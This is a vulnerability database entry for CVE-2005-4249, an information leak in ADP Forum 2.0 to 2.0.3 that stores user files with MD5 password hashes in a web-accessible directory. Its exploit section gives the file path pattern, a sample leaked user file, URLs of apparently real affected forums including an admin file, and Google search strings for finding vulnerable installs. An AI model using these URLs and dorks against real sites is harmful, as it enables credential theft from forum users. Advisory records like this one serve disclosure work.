ADP Forum信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1196933 漏洞类型 未知
发布时间 2005-12-15 更新时间 2005-12-15
CVE编号 CVE-2005-4249 CNNVD-ID CNNVD-200512-308
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/88935
https://cxsecurity.com/issue/WLB-2005120033
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-308
|漏洞详情
ADPForum2.0~2.0.3将敏感信息以纯文本文件的形式存放在访问控制不足的web文档根目录下,远程攻击者可以通过对forum/users目录的请求获取用户凭证。
|漏洞EXP
ADP Forum 2.0,ADP Forum 2.0.1,ADP Forum 2.0.2,ADP Forum 2.0.3  versiyon user md5 hash bug

----------------------------------------------------
site:http://www.linux.it/~fedro/
demo:http://www.e-stamp.ru/forum203/

--------------------------------------------------

http://target.com/pacth/users/username.txt

----------------------------------------------------

username.txt file
 
 
username
Master Member
52
images/avatars/1037850652.jpg
http://www.website.com
wamp (at) website (dot) com [email concealed]
176311476
20-11-2002
username
1f8c48c0c6e421b907e72ab6d4aa8ca9
1037850652

--------------------------------------------------------
example:

http://www.wamp.ca/forum/users/Paul.txt
http://www.wamp.ca/forum/users/javadog.txt
http://www.e-stamp.ru/forum203/users/admin.txt

vs..

---------------------------------------------------------

Credit:Liz0ziM
mail:liz0 (at) bsdmail (dot) com [email concealed]
www.biyo.tk,www.cehennem.org

-----------------------------------------------------------

http://www.blogcu.com/Liz0ziM/144336/
http://biyo.5gigs.com/adpforum.txt

------------------------------------------------------------
google:

"ADP Forum 2.0.3 is powered by VzScripts"
"ADP Forum 2.0.2"
"ADP Forum 2.0.1"
"ADP Forum 2.0"
|受影响的产品
Adp Adp Forum 2.0.3 Adp Adp Forum 2.0.2 Adp Adp Forum 2.0.1 Adp Adp Forum 2.0
|参考资料

来源:BUGTRAQ
名称:20051213ADPForum2.0,ADPForum2.0.1,ADPForum2.0.2,ADPForum2.0.3versiyonusermd5hashbug
链接:http://www.securityfocus.com/archive/1/archive/1/419393/100/0/threaded
来源:MISC
链接:http://www.blogcu.com/Liz0ziM/144336/
来源:SECUNIA
名称:18027
链接:http://secunia.com/advisories/18027
来源:SREASON
名称:253
链接:http://securityreason.com/securityalert/253